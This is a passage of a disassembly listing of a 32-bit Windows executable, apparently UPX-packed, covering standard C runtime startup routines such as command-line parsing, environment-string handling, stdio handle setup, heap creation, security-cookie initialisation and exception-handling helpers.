push ebp
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_406313: ; CODE XREF: sub_4062B7+9E�j
push esi
call sub_4026A0
mov ebp, eax
inc ebp
cmp byte ptr [esi], 3Dh
pop ecx
jz short loc_406351
push 1
push ebp
call sub_405413
cmp eax, ebx
pop ecx
pop ecx
mov [edi], eax
jz short loc_40637C
push esi
push ebp
push eax
call sub_404FAE
add esp, 0Ch
test eax, eax
jz short loc_40634E
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402095
add esp, 14h
loc_40634E: ; CODE XREF: sub_4062B7+88�j
add edi, 4
loc_406351: ; CODE XREF: sub_4062B7+69�j
add esi, ebp
loc_406353: ; CODE XREF: sub_4062B7+5A�j
cmp [esi], bl
jnz short loc_406313
push ds:dword_40FE14
call sub_404F20
mov ds:dword_40FE14, ebx
mov [edi], ebx
mov ds:dword_410A00, 1
xor eax, eax
loc_406376: ; CODE XREF: sub_4062B7+D9�j
pop ecx
pop ebp
loc_406378: ; CODE XREF: sub_4062B7+21�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40637C: ; CODE XREF: sub_4062B7+79�j
push ds:dword_410180
call sub_404F20
mov ds:dword_410180, ebx
or eax, 0FFFFFFFFh
jmp short loc_406376
sub_4062B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406392 proc near ; CODE XREF: sub_40652A+55�p
; sub_40652A+96�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_8]
push ebx
xor eax, eax
cmp [ebp+arg_0], eax
push esi
mov [edi], eax
mov esi, edx
mov edx, [ebp+arg_4]
mov dword ptr [ecx], 1
jz short loc_4063B8
mov ebx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ebx], edx
loc_4063B8: ; CODE XREF: sub_406392+1B�j
mov [ebp+var_4], eax
loc_4063BB: ; CODE XREF: sub_406392+7E�j
; sub_406392+88�j
cmp byte ptr [esi], 22h
jnz short loc_4063D0
xor eax, eax
cmp [ebp+var_4], eax
mov bl, 22h
setz al
inc esi
mov [ebp+var_4], eax
jmp short loc_40640C
; ---------------------------------------------------------------------------
loc_4063D0: ; CODE XREF: sub_406392+2C�j
inc dword ptr [edi]
test edx, edx
jz short loc_4063DE
mov al, [esi]
mov [edx], al
inc edx
mov [ebp+arg_4], edx
loc_4063DE: ; CODE XREF: sub_406392+42�j
mov bl, [esi]
movzx eax, bl
push eax
inc esi
call sub_409D20
test eax, eax
pop ecx
jz short loc_406402
inc dword ptr [edi]
cmp [ebp+arg_4], 0
jz short loc_406401
mov ecx, [ebp+arg_4]
mov al, [esi]
inc [ebp+arg_4]
mov [ecx], al
loc_406401: ; CODE XREF: sub_406392+63�j
inc esi
loc_406402: ; CODE XREF: sub_406392+5B�j
test bl, bl
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_8]
jz short loc_40643E
loc_40640C: ; CODE XREF: sub_406392+3C�j
cmp [ebp+var_4], 0
jnz short loc_4063BB
cmp bl, 20h
jz short loc_40641C
cmp bl, 9
jnz short loc_4063BB
loc_40641C: ; CODE XREF: sub_406392+83�j
test edx, edx
jz short loc_406424
mov byte ptr [edx-1], 0
loc_406424: ; CODE XREF: sub_406392+8C�j
; sub_406392+AD�j
and [ebp+var_4], 0
loc_406428: ; CODE XREF: sub_406392+183�j
cmp byte ptr [esi], 0
jz loc_40651A
loc_406431: ; CODE XREF: sub_406392+AA�j
mov al, [esi]
cmp al, 20h
jz short loc_40643B
cmp al, 9
jnz short loc_406441
loc_40643B: ; CODE XREF: sub_406392+A3�j
inc esi
jmp short loc_406431
; ---------------------------------------------------------------------------
loc_40643E: ; CODE XREF: sub_406392+78�j
dec esi
jmp short loc_406424
; ---------------------------------------------------------------------------
loc_406441: ; CODE XREF: sub_406392+A7�j
cmp byte ptr [esi], 0
jz loc_40651A
cmp [ebp+arg_0], 0
jz short loc_406459
mov eax, [ebp+arg_0]
add [ebp+arg_0], 4
mov [eax], edx
loc_406459: ; CODE XREF: sub_406392+BC�j
inc dword ptr [ecx]
loc_40645B: ; CODE XREF: sub_406392+16E�j
xor ebx, ebx
inc ebx
xor ecx, ecx
jmp short loc_406464
; ---------------------------------------------------------------------------
loc_406462: ; CODE XREF: sub_406392+D5�j
inc esi
inc ecx
loc_406464: ; CODE XREF: sub_406392+CE�j
cmp byte ptr [esi], 5Ch
jz short loc_406462
cmp byte ptr [esi], 22h
jnz short loc_406494
test cl, 1
jnz short loc_406492
cmp [ebp+var_4], 0
jz short loc_406485
lea eax, [esi+1]
cmp byte ptr [eax], 22h
jnz short loc_406485
mov esi, eax
jmp short loc_406492
; ---------------------------------------------------------------------------
loc_406485: ; CODE XREF: sub_406392+E5�j
; sub_406392+ED�j
xor eax, eax
xor ebx, ebx
cmp [ebp+var_4], eax
setz al
mov [ebp+var_4], eax
loc_406492: ; CODE XREF: sub_406392+DF�j
; sub_406392+F1�j
shr ecx, 1
loc_406494: ; CODE XREF: sub_406392+DA�j
test ecx, ecx
jz short loc_4064AA
loc_406498: ; CODE XREF: sub_406392+113�j
dec ecx
test edx, edx
jz short loc_4064A1
mov byte ptr [edx], 5Ch
inc edx
loc_4064A1: ; CODE XREF: sub_406392+109�j
inc dword ptr [edi]
test ecx, ecx
jnz short loc_406498
mov [ebp+arg_4], edx
loc_4064AA: ; CODE XREF: sub_406392+104�j
mov al, [esi]
test al, al
jz short loc_406505
cmp [ebp+var_4], 0
jnz short loc_4064BE
cmp al, 20h
jz short loc_406505
cmp al, 9
jz short loc_406505
loc_4064BE: ; CODE XREF: sub_406392+122�j
test ebx, ebx
jz short loc_4064FF
test edx, edx
movsx eax, al
push eax
jz short loc_4064ED
call sub_409D20
test eax, eax
pop ecx
jz short loc_4064E1
mov al, [esi]
mov ecx, [ebp+arg_4]
inc [ebp+arg_4]
mov [ecx], al
inc esi
inc dword ptr [edi]
loc_4064E1: ; CODE XREF: sub_406392+140�j
mov ecx, [ebp+arg_4]
mov al, [esi]
inc [ebp+arg_4]
mov [ecx], al
jmp short loc_4064FA
; ---------------------------------------------------------------------------
loc_4064ED: ; CODE XREF: sub_406392+136�j
call sub_409D20
test eax, eax
pop ecx
jz short loc_4064FA
inc esi
inc dword ptr [edi]
loc_4064FA: ; CODE XREF: sub_406392+159�j
; sub_406392+163�j
inc dword ptr [edi]
mov edx, [ebp+arg_4]
loc_4064FF: ; CODE XREF: sub_406392+12E�j
inc esi
jmp loc_40645B
; ---------------------------------------------------------------------------
loc_406505: ; CODE XREF: sub_406392+11C�j
; sub_406392+126�j ...
test edx, edx
jz short loc_406510
mov byte ptr [edx], 0
inc edx
mov [ebp+arg_4], edx
loc_406510: ; CODE XREF: sub_406392+175�j
inc dword ptr [edi]
mov ecx, [ebp+arg_8]
jmp loc_406428
; ---------------------------------------------------------------------------
loc_40651A: ; CODE XREF: sub_406392+99�j
; sub_406392+B2�j
mov eax, [ebp+arg_0]
test eax, eax
pop esi
pop ebx
jz short loc_406526
and dword ptr [eax], 0
loc_406526: ; CODE XREF: sub_406392+18F�j
inc dword ptr [ecx]
leave
retn
sub_406392 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40652A proc near ; CODE XREF: start-F8AB�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
xor ebx, ebx
cmp ds:dword_410A0C, ebx
push esi
push edi
jnz short loc_406542
call sub_40842A
loc_406542: ; CODE XREF: sub_40652A+11�j
push 104h
mov esi, offset dword_4104C8
push esi
push ebx
mov ds:byte_4105CC, bl
call dword_40C09C ; GetModuleFileNameA
mov eax, ds:dword_410A24
cmp eax, ebx
mov ds:dword_410190, esi
jz short loc_406570
cmp [eax], bl
mov [ebp+var_4], eax
jnz short loc_406573
loc_406570: ; CODE XREF: sub_40652A+3D�j
mov [ebp+var_4], esi
loc_406573: ; CODE XREF: sub_40652A+44�j
mov edx, [ebp+var_4]
lea eax, [ebp+var_8]
push eax
push ebx
push ebx
lea edi, [ebp+var_C]
call sub_406392
mov eax, [ebp+var_8]
add esp, 0Ch
cmp eax, 3FFFFFFFh
jnb short loc_4065DB
mov ecx, [ebp+var_C]
cmp ecx, 0FFFFFFFFh
jnb short loc_4065DB
mov edi, eax
shl edi, 2
lea eax, [edi+ecx]
cmp eax, ecx
jb short loc_4065DB
push eax
call sub_4053D3
mov esi, eax
cmp esi, ebx
pop ecx
jz short loc_4065DB
mov edx, [ebp+var_4]
lea eax, [ebp+var_8]
push eax
add edi, esi
push edi
push esi
lea edi, [ebp+var_C]
call sub_406392
mov eax, [ebp+var_8]
add esp, 0Ch
dec eax
mov ds:dword_410174, eax
mov ds:dword_410178, esi
xor eax, eax
jmp short loc_4065DE
; ---------------------------------------------------------------------------
loc_4065DB: ; CODE XREF: sub_40652A+65�j
; sub_40652A+6D�j ...
or eax, 0FFFFFFFFh
loc_4065DE: ; CODE XREF: sub_40652A+AF�j
pop edi
pop esi
pop ebx
leave
retn
sub_40652A endp
; =============== S U B R O U T I N E =======================================
sub_4065E3 proc near ; CODE XREF: start-F8B5�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, ds:dword_4105D0
push ebx
push ebp
push esi
push edi
mov edi, dword_40C0B0
xor ebx, ebx
xor esi, esi
cmp eax, ebx
push 2
pop ebp
jnz short loc_40662C
call edi ; dword_40C0B0
mov esi, eax
cmp esi, ebx
jz short loc_406613
mov ds:dword_4105D0, 1
jmp short loc_406635
; ---------------------------------------------------------------------------
loc_406613: ; CODE XREF: sub_4065E3+22�j
call dword_40C088 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_406627
mov eax, ebp
mov ds:dword_4105D0, eax
jmp short loc_40662C
; ---------------------------------------------------------------------------
loc_406627: ; CODE XREF: sub_4065E3+39�j
mov eax, ds:dword_4105D0
loc_40662C: ; CODE XREF: sub_4065E3+1A�j
; sub_4065E3+42�j
cmp eax, 1
jnz loc_4066B9
loc_406635: ; CODE XREF: sub_4065E3+2E�j
cmp esi, ebx
jnz short loc_406648
call edi ; dword_40C0B0
mov esi, eax
cmp esi, ebx
jnz short loc_406648
loc_406641: ; CODE XREF: sub_4065E3+DC�j
; sub_4065E3+E8�j ...
xor eax, eax
jmp loc_406711
; ---------------------------------------------------------------------------
loc_406648: ; CODE XREF: sub_4065E3+54�j
; sub_4065E3+5C�j
cmp [esi], bx
mov eax, esi
jz short loc_40665D
loc_40664F: ; CODE XREF: sub_4065E3+71�j
; sub_4065E3+78�j
add eax, ebp
cmp [eax], bx
jnz short loc_40664F
add eax, ebp
cmp [eax], bx
jnz short loc_40664F
loc_40665D: ; CODE XREF: sub_4065E3+6A�j
mov edi, dword_40C0AC
push ebx
push ebx
push ebx
sub eax, esi
push ebx
sar eax, 1
inc eax
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; dword_40C0AC
mov ebp, eax
cmp ebp, ebx
jz short loc_4066AE
push ebp
call sub_4053D3
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_4066AE
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; dword_40C0AC
test eax, eax
jnz short loc_4066AA
push [esp+18h+var_8]
call sub_404F20
pop ecx
mov [esp+18h+var_8], ebx
loc_4066AA: ; CODE XREF: sub_4065E3+B7�j
mov ebx, [esp+18h+var_8]
loc_4066AE: ; CODE XREF: sub_4065E3+97�j
; sub_4065E3+A6�j
push esi
call dword_40C0A8 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_406711
; ---------------------------------------------------------------------------
loc_4066B9: ; CODE XREF: sub_4065E3+4C�j
cmp eax, ebp
jz short loc_4066C1
cmp eax, ebx
jnz short loc_406641
loc_4066C1: ; CODE XREF: sub_4065E3+D8�j
call dword_40C0A4 ; GetEnvironmentStringsA
mov esi, eax
cmp esi, ebx
jz loc_406641
cmp [esi], bl
jz short loc_4066DF
loc_4066D5: ; CODE XREF: sub_4065E3+F5�j
; sub_4065E3+FA�j
inc eax
cmp [eax], bl
jnz short loc_4066D5
inc eax
cmp [eax], bl
jnz short loc_4066D5
loc_4066DF: ; CODE XREF: sub_4065E3+F0�j
sub eax, esi
inc eax
mov ebp, eax
push ebp
call sub_4053D3
mov edi, eax
cmp edi, ebx
pop ecx
jnz short loc_4066FD
push esi
call dword_40C0A0 ; FreeEnvironmentStringsA
jmp loc_406641
; ---------------------------------------------------------------------------
loc_4066FD: ; CODE XREF: sub_4065E3+10C�j
push ebp
push esi
push edi
call sub_405020
add esp, 0Ch
push esi
call dword_40C0A0 ; FreeEnvironmentStringsA
mov eax, edi
loc_406711: ; CODE XREF: sub_4065E3+60�j
; sub_4065E3+D4�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_4065E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406718 proc near ; CODE XREF: start-F8D1�p
var_64 = byte ptr -64h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 54h
push offset dword_40DF88
call __SEH_prolog4
xor edi, edi
mov [ebp+ms_exc.disabled], edi
lea eax, [ebp+var_64]
push eax
call dword_40C058 ; GetStartupInfoA
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
push 38h
push 20h
pop esi
push esi
call sub_405413
pop ecx
pop ecx
cmp eax, edi
jz loc_40694F
mov ds:dword_410900, eax
mov ds:dword_4108E8, esi
lea ecx, [eax+700h]
jmp short loc_40678B
; ---------------------------------------------------------------------------
loc_406762: ; CODE XREF: sub_406718+75�j
mov byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov [eax+8], edi
mov byte ptr [eax+24h], 0
mov byte ptr [eax+25h], 0Ah
mov byte ptr [eax+26h], 0Ah
add eax, 38h
mov ecx, ds:dword_410900
add ecx, 700h
loc_40678B: ; CODE XREF: sub_406718+48�j
cmp eax, ecx
jb short loc_406762
cmp [ebp+var_32], di
jz loc_406896
mov eax, [ebp+var_30]
cmp eax, edi
jz loc_406896
mov edi, [eax]
lea ebx, [eax+4]
lea eax, [ebx+edi]
mov [ebp+var_1C], eax
mov eax, 800h
cmp edi, eax
jl short loc_4067BA
mov edi, eax
loc_4067BA: ; CODE XREF: sub_406718+9E�j
xor esi, esi
inc esi
jmp short loc_406811
; ---------------------------------------------------------------------------
loc_4067BF: ; CODE XREF: sub_406718+FF�j
push 38h
push 20h
call sub_405413
pop ecx
pop ecx
test eax, eax
jz short loc_40681B
lea ecx, ds:410900h[esi*4]
mov [ecx], eax
add ds:dword_4108E8, 20h
lea edx, [eax+700h]
jmp short loc_40680C
; ---------------------------------------------------------------------------
loc_4067E6: ; CODE XREF: sub_406718+F6�j
mov byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
and dword ptr [eax+8], 0
and byte ptr [eax+24h], 80h
mov byte ptr [eax+25h], 0Ah
mov byte ptr [eax+26h], 0Ah
add eax, 38h
mov edx, [ecx]
add edx, 700h
loc_40680C: ; CODE XREF: sub_406718+CC�j
cmp eax, edx
jb short loc_4067E6
inc esi
loc_406811: ; CODE XREF: sub_406718+A5�j
cmp ds:dword_4108E8, edi
jl short loc_4067BF
jmp short loc_406821
; ---------------------------------------------------------------------------
loc_40681B: ; CODE XREF: sub_406718+B4�j
mov edi, ds:dword_4108E8
loc_406821: ; CODE XREF: sub_406718+101�j
and [ebp+var_20], 0
test edi, edi
jle short loc_406896
loc_406829: ; CODE XREF: sub_406718+17C�j
mov eax, [ebp+var_1C]
mov ecx, [eax]
cmp ecx, 0FFFFFFFFh
jz short loc_406889
cmp ecx, 0FFFFFFFEh
jz short loc_406889
mov al, [ebx]
test al, 1
jz short loc_406889
test al, 8
jnz short loc_40684D
push ecx
call dword_40C0B8 ; GetFileType
test eax, eax
jz short loc_406889
loc_40684D: ; CODE XREF: sub_406718+128�j
mov esi, [ebp+var_20]
mov eax, esi
sar eax, 5
and esi, 1Fh
imul esi, 38h
add esi, ds:dword_410900[eax*4]
mov eax, [ebp+var_1C]
mov eax, [eax]
mov [esi], eax
mov al, [ebx]
mov [esi+4], al
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_409843
pop ecx
pop ecx
test eax, eax
jz loc_40694F
inc dword ptr [esi+8]
loc_406889: ; CODE XREF: sub_406718+119�j
; sub_406718+11E�j ...
inc [ebp+var_20]
inc ebx
add [ebp+var_1C], 4
cmp [ebp+var_20], edi
jl short loc_406829
loc_406896: ; CODE XREF: sub_406718+7B�j
; sub_406718+86�j ...
xor ebx, ebx
loc_406898: ; CODE XREF: sub_406718+213�j
mov esi, ebx
imul esi, 38h
add esi, ds:dword_410900
mov eax, [esi]
cmp eax, 0FFFFFFFFh
jz short loc_4068B5
cmp eax, 0FFFFFFFEh
jz short loc_4068B5
or byte ptr [esi+4], 80h
jmp short loc_406927
; ---------------------------------------------------------------------------
loc_4068B5: ; CODE XREF: sub_406718+190�j
; sub_406718+195�j
mov byte ptr [esi+4], 81h
test ebx, ebx
jnz short loc_4068C2
push 0FFFFFFF6h
pop eax
jmp short loc_4068CC
; ---------------------------------------------------------------------------
loc_4068C2: ; CODE XREF: sub_406718+1A3�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_4068CC: ; CODE XREF: sub_406718+1A8�j
push eax
call dword_40C000 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_40691D
test edi, edi
jz short loc_40691D
push edi
call dword_40C0B8 ; GetFileType
test eax, eax
jz short loc_40691D
mov [esi], edi
and eax, 0FFh
cmp eax, 2
jnz short loc_4068FB
or byte ptr [esi+4], 40h
jmp short loc_406904
; ---------------------------------------------------------------------------
loc_4068FB: ; CODE XREF: sub_406718+1DB�j
cmp eax, 3
jnz short loc_406904
or byte ptr [esi+4], 8
loc_406904: ; CODE XREF: sub_406718+1E1�j
; sub_406718+1E6�j
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_409843
pop ecx
pop ecx
test eax, eax
jz short loc_40694F
inc dword ptr [esi+8]
jmp short loc_406927
; ---------------------------------------------------------------------------
loc_40691D: ; CODE XREF: sub_406718+1C0�j
; sub_406718+1C4�j ...
or byte ptr [esi+4], 40h
mov dword ptr [esi], 0FFFFFFFEh
loc_406927: ; CODE XREF: sub_406718+19B�j
; sub_406718+203�j
inc ebx
cmp ebx, 3
jl loc_406898
push ds:dword_4108E8
call dword_40C0B4 ; SetHandleCount
xor eax, eax
jmp short loc_406952
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_40694F: ; CODE XREF: sub_406718+31�j
; sub_406718+168�j ...
or eax, 0FFFFFFFFh
loc_406952: ; CODE XREF: sub_406718+227�j
call __SEH_epilog4
retn
sub_406718 endp
; =============== S U B R O U T I N E =======================================
sub_406958 proc near ; CODE XREF: start:loc_404057�p
push esi
push edi
mov eax, offset dword_40DDE0
mov edi, offset dword_40DDE0
cmp eax, edi
mov esi, eax
jnb short loc_406979
loc_40696A: ; CODE XREF: sub_406958+1F�j
mov eax, [esi]
test eax, eax
jz short loc_406972
call eax
loc_406972: ; CODE XREF: sub_406958+16�j
add esi, 4
cmp esi, edi
jb short loc_40696A
loc_406979: ; CODE XREF: sub_406958+10�j
pop edi
pop esi
retn
sub_406958 endp
; =============== S U B R O U T I N E =======================================
sub_40697C proc near ; DATA XREF: sub_405665+3F�o
push esi
push edi
mov eax, offset dword_40DDE8
mov edi, offset dword_40DDE8
cmp eax, edi
mov esi, eax
jnb short loc_40699D
loc_40698E: ; CODE XREF: sub_40697C+1F�j
mov eax, [esi]
test eax, eax
jz short loc_406996
call eax
loc_406996: ; CODE XREF: sub_40697C+16�j
add esi, 4
cmp esi, edi
jb short loc_40698E
loc_40699D: ; CODE XREF: sub_40697C+10�j
pop edi
pop esi
retn
sub_40697C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4069A0 proc near ; CODE XREF: sub_4069FB:loc_406A1E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
lea eax, [ebp+var_4]
xor esi, esi
push eax
mov [ebp+var_4], esi
mov [ebp+var_8], esi
call sub_4055F2
test eax, eax
pop ecx
jz short loc_4069C9
push esi
push esi
push esi
push esi
push esi
call sub_402095
add esp, 14h
loc_4069C9: ; CODE XREF: sub_4069A0+1A�j
lea eax, [ebp+var_8]
push eax
call sub_405629
test eax, eax
pop ecx
jz short loc_4069E4
push esi
push esi
push esi
push esi
push esi
call sub_402095
add esp, 14h
loc_4069E4: ; CODE XREF: sub_4069A0+35�j
cmp [ebp+var_4], 2
pop esi
jnz short loc_4069F6
cmp [ebp+var_8], 5
jb short loc_4069F6
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_4069F6: ; CODE XREF: sub_4069A0+49�j
; sub_4069A0+4F�j
push 3
pop eax
leave
retn
sub_4069A0 endp
; =============== S U B R O U T I N E =======================================
sub_4069FB proc near ; CODE XREF: start-F8FC�p
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
push 0
setz al
push 1000h
push eax
call dword_40C0C4 ; HeapCreate
test eax, eax
mov ds:dword_4105D4, eax
jnz short loc_406A1E
loc_406A1B: ; CODE XREF: sub_4069FB+54�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_406A1E: ; CODE XREF: sub_4069FB+1E�j
call sub_4069A0
cmp eax, 3
mov ds:dword_4108E4, eax
jnz short loc_406A51
push 3F8h
call sub_408505
test eax, eax
pop ecx
jnz short loc_406A51
push ds:dword_4105D4
call dword_40C0C0 ; HeapDestroy
and ds:dword_4105D4, 0
jmp short loc_406A1B
; ---------------------------------------------------------------------------
loc_406A51: ; CODE XREF: sub_4069FB+30�j
; sub_4069FB+3F�j
xor eax, eax
inc eax
retn
sub_4069FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A55 proc near ; CODE XREF: start:loc_404143�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
mov eax, ds:dword_40F060
and [ebp+var_8], 0
and [ebp+var_4], 0
push ebx
push edi
mov edi, 0BB40E64Eh
cmp eax, edi
mov ebx, 0FFFF0000h
jz short loc_406A85
test eax, ebx
jz short loc_406A85
not eax
mov ds:dword_40F064, eax
jmp short loc_406AE5
; ---------------------------------------------------------------------------
loc_406A85: ; CODE XREF: sub_406A55+21�j
; sub_406A55+25�j
push esi
lea eax, [ebp+var_8]
push eax
call dword_40C0D8 ; GetSystemTimeAsFileTime
mov esi, [ebp+var_4]
xor esi, [ebp+var_8]
call dword_40C0D4 ; GetCurrentProcessId
xor esi, eax
call dword_40C084 ; GetCurrentThreadId
xor esi, eax
call dword_40C0D0 ; GetTickCount
xor esi, eax
lea eax, [ebp+var_10]
push eax
call dword_40C0CC ; QueryPerformanceCounter
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor esi, eax
cmp esi, edi
jnz short loc_406ACB
mov esi, 0BB40E64Fh
jmp short loc_406AD6
; ---------------------------------------------------------------------------
loc_406ACB: ; CODE XREF: sub_406A55+6D�j
test esi, ebx
jnz short loc_406AD6
mov eax, esi
shl eax, 10h
or esi, eax
loc_406AD6: ; CODE XREF: sub_406A55+74�j
; sub_406A55+78�j
mov ds:dword_40F060, esi
not esi
mov ds:dword_40F064, esi
pop esi
loc_406AE5: ; CODE XREF: sub_406A55+2E�j
pop edi
pop ebx
leave
retn
sub_406A55 endp
; ---------------------------------------------------------------------------
mov dword ptr [ecx], offset off_40C864
jmp sub_4024AF
; ---------------------------------------------------------------------------
loc_406AF4: ; DATA XREF: UPX0:off_40C864�o
push esi
mov esi, ecx
mov dword ptr [esi], offset off_40C864
call sub_4024AF
test byte ptr [esp+8], 1
jz short loc_406B10
push esi
call sub_4023DB
pop ecx
loc_406B10: ; CODE XREF: UPX0:00406B07�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_406B16 proc near ; CODE XREF: sub_406D55+4E�p
; sub_407321+21A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_0]
mov eax, [edi+4]
test eax, eax
jz short loc_406B6C
lea edx, [eax+8]
cmp byte ptr [edx], 0
jz short loc_406B6C
mov esi, [esp+8+arg_4]
mov ecx, [esi+4]
cmp eax, ecx
jz short loc_406B4A
add ecx, 8
push ecx
push edx
call sub_405E50
test eax, eax
pop ecx
pop ecx
jz short loc_406B4A
loc_406B46: ; CODE XREF: sub_406B16+3C�j
; sub_406B16+4B�j ...
xor eax, eax
jmp short loc_406B6F
; ---------------------------------------------------------------------------
loc_406B4A: ; CODE XREF: sub_406B16+1E�j
; sub_406B16+2E�j
test byte ptr [esi], 2
jz short loc_406B54
test byte ptr [edi], 8
jz short loc_406B46
loc_406B54: ; CODE XREF: sub_406B16+37�j
mov eax, [esp+8+arg_8]
mov eax, [eax]
test al, 1
jz short loc_406B63
test byte ptr [edi], 1
jz short loc_406B46
loc_406B63: ; CODE XREF: sub_406B16+46�j
test al, 2
jz short loc_406B6C
test byte ptr [edi], 2
jz short loc_406B46
loc_406B6C: ; CODE XREF: sub_406B16+B�j
; sub_406B16+13�j ...
xor eax, eax
inc eax
loc_406B6F: ; CODE XREF: sub_406B16+32�j
pop edi
pop esi
retn
sub_406B16 endp
; =============== S U B R O U T I N E =======================================
sub_406B72 proc near ; CODE XREF: sub_406BB6+85�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
mov eax, [eax]
cmp eax, 0E0434F4Dh
jz short loc_406B99
cmp eax, 0E06D7363h
jnz short loc_406BB3
call sub_404927
and dword ptr [eax+90h], 0
jmp sub_407773
; ---------------------------------------------------------------------------
loc_406B99: ; CODE XREF: sub_406B72+D�j
call sub_404927
cmp dword ptr [eax+90h], 0
jle short loc_406BB3
call sub_404927
add eax, 90h
dec dword ptr [eax]
loc_406BB3: ; CODE XREF: sub_406B72+14�j
; sub_406B72+33�j
xor eax, eax
retn
sub_406B72 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406BB6 proc near ; CODE XREF: sub_406E17+EC�p
; sub_4071C3+36�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 10h
push offset dword_40DFA8
call __SEH_prolog4
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
cmp dword ptr [edi+4], 80h
jg short loc_406BD7
movsx esi, byte ptr [ebx+8]
jmp short loc_406BDA
; ---------------------------------------------------------------------------
loc_406BD7: ; CODE XREF: sub_406BB6+19�j
mov esi, [ebx+8]
loc_406BDA: ; CODE XREF: sub_406BB6+1F�j
mov [ebp+var_1C], esi
call sub_404927
add eax, 90h
inc dword ptr [eax]
and [ebp+ms_exc.disabled], 0
loc_406BED: ; CODE XREF: sub_406BB6+9F�j
cmp esi, [ebp+arg_C]
jz short loc_406C57
cmp esi, 0FFFFFFFFh
jle short loc_406BFC
cmp esi, [edi+4]
jl short loc_406C01
loc_406BFC: ; CODE XREF: sub_406BB6+3F�j
call sub_4077BF
loc_406C01: ; CODE XREF: sub_406BB6+44�j
mov eax, esi
shl eax, 3
mov ecx, [edi+8]
add ecx, eax
mov esi, [ecx]
mov [ebp+var_20], esi
mov [ebp+ms_exc.disabled], 1
cmp dword ptr [ecx+4], 0
jz short loc_406C32
mov [ebx+8], esi
push 103h
push ebx
mov ecx, [edi+8]
push dword ptr [ecx+eax+4]
call sub_407810
loc_406C32: ; CODE XREF: sub_406BB6+65�j
and [ebp+ms_exc.disabled], 0
jmp short loc_406C52
; ---------------------------------------------------------------------------
loc_406C38: ; DATA XREF: UPX1:0040DFC8�o
push [ebp+ms_exc.exc_ptr]
call sub_406B72
pop ecx
retn
; ---------------------------------------------------------------------------
loc_406C42: ; DATA XREF: UPX1:0040DFCC�o
mov esp, [ebp+ms_exc.old_esp]
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_20]
loc_406C52: ; CODE XREF: sub_406BB6+80�j
mov [ebp+var_1C], esi
jmp short loc_406BED
; ---------------------------------------------------------------------------
loc_406C57: ; CODE XREF: sub_406BB6+3A�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_406C7C
cmp esi, [ebp+arg_C]
jz short loc_406C6D
call sub_4077BF
loc_406C6D: ; CODE XREF: sub_406BB6+B0�j
mov [ebx+8], esi
call __SEH_epilog4
retn
sub_406BB6 endp
; =============== S U B R O U T I N E =======================================
sub_406C76 proc near ; DATA XREF: UPX1:0040DFC0�o
mov ebx, [ebp+8]
mov esi, [ebp-1Ch]
sub_406C76 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_406C7C proc near ; CODE XREF: sub_406BB6+A8�p
call sub_404927
cmp dword ptr [eax+90h], 0
jle short locret_406C96
call sub_404927
add eax, 90h
dec dword ptr [eax]
